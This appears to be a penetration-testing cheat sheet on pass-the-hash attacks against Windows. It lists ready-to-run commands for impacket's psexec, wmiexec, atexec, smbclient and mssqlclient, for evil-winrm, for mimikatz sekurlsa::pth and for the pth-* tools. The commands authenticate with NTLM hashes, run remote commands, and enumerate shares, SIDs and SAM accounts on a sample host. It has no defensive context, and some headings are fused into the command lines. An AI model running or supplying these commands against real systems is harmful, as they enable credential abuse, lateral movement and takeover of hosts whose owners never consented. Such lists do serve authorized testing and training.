Pass the Hash
https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/
PsExec
proxychains -q psexec.py -k -no-pass domain.com/username@machine -dc-ip IP -tartget-ip IP
python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.2WinRM
evil-winrm -i 192.168.1.2 -u [domain\\]username -H 052e763020c5da81d4085a05e69b0f1bWMI
python3 impacket/examples/wmiexec.py -k --no-pass [domain/]username@192.168.1.2SQL
python3 impacket/examples/mssqlclient.py -p 1433 -windows-auth domain/username@1.1.1.1 -hashes :052e763020c5da81d4085a05e69b0f1bMimikatz
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:admin /domain:red.local /ntlm:09238831b1af5edab93c773f56409d96" exitother
python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2
pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2/c$
pth-wmic -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2 "select Name from Win32_UserAccount"
python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2
pth-rpcclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2
pth-net rpc share list -U 'ignite\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.2
python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.2 whoami
python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2
python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2Last updated